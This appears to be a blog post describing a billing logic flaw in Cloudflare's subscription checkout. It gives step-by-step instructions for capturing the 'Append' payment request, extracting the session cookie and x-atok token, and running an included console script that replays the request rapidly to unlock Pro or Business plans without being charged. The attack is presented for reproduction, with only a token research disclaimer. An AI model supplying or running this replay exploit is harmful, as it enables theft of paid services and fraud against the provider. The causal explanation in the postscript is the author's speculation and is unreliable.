Cloudflare Billing Logic Flaw: Bypassing Premium Subscriptions via Request Replay

While reverse-engineering Cloudflare’s subscription system, I discovered an interesting “gap” between the frontend checkout logic and the backend state synchronization. By using a specific request replay technique, it is possible to trick the backend into activating the Pro or Business plan without the system generating an actual bill.

Screenshot

01. Core Behavior: A “Quantum Superposition” of Identity and Permissions

This bypass method places the account in a peculiar state of misalignment:

  • Privilege Escalation: The account effectively unlocks exclusive Pro/Business features (such as advanced WAF rules, image optimization, dedicated edge nodes, etc.).
  • Logic Mismatch: The subscription management interface still displays the Free plan. Since the billing loop is never closed, the system generates no pending payment items or actual charges.
  • Zero-Cost Operation: Exploiting the logic flaw in the checkout interface allows for “free access” to premium privileges.

02. Prerequisites

Before reproducing this logic flaw, the following conditions must be met:

  1. Domain Onboarding: The domain has been successfully added to the Cloudflare account.
  2. Payment Environment: No valid credit card is linked to the account (or a card with a zero balance is linked to pass the initial check).
  3. Target Selection: On the Active Subscriptions page, click Change, select the Pro or Business plan you wish to activate, and proceed to the payment page.

03. Steps: Capture and Replay

Using browser Developer Tools (DevTools), we can manually intervene in the checkout request.

Step 1: Locate the Key Request

Open the Network tab and click the payment button at the bottom of the page. Within the resulting traffic, locate the POST request named Append.

Step 2: Extract Core Metadata

Select the request and extract the following key parameters from the Headers and Payload sections:

  • Request URL: The full API endpoint address.
  • Cookie: Authentication credentials for the current session.
  • X-atok: A Cloudflare-specific CSRF/authentication token.
  • Payload: Click View Source within the Request Payload section to retrieve the raw JSON structure.

Step 3: Console Script Injection

Switch to the Console tab and use the asynchronous script below to perform high-frequency replays.


04. Automated Replay Script

/**
 * Cloudflare Subscription Bypass Replay Script
 * For technical research purposes only; do not use for illegal activities.
 */

const url = 'PASTE_YOUR_URL_HERE'; 

const headers = {
  'content-type': 'application/json',
  'accept': '*/*',
  'origin': 'https://dash.cloudflare.com',
  'referer': 'https://dash.cloudflare.com/',
  'x-atok': 'PASTE_YOUR_X_ATOK_HERE',
  'x-cross-site-security': 'dash',
  'cookie': 'PASTE_YOUR_COOKIE_HERE',
  'user-agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/133.0.0.0 Safari/537.36'
};

// Insert the payload data found in "View Source"
const payload = { /* ... */ };

const delay = ms => new Promise(res => setTimeout(res, ms));

(async () => {
  console.log("%c Starting request replay...", "color: #007aff; font-weight: bold;");
  
  for (let i = 0; i < 10; i++) {
    fetch(url, {
      method: 'POST',
      headers: headers,
      body: JSON.stringify(payload)
    })
    .then(res => console.log(`[Batch ${i}] Status: ${res.status}`))
    .catch(err => console.error(`[Batch ${i}] Error:`, err));

    await delay(100); // 100ms interval to simulate concurrent race conditions
  }
  
  console.log("%c Script execution complete; please refresh the dashboard to verify permissions.", "color: #34c759; font-weight: bold;");
})();

Screenshot


05. Technical Postscript

The root cause of this vulnerability likely stems from how Cloudflare handled the Append operation: the system executed the permission-granting logic first, while validating the payment result asynchronously. Under rapid, concurrent requests, the backend distributed database may have experienced a temporary state synchronization lag; consequently, permissions were written to the metadata, even though the billing transaction was subsequently rolled back due to a failed payment.

This “board first, pay later” approach is common among SaaS platforms striving for a seamless frontend experience, yet it also offers an excellent entry point for security research.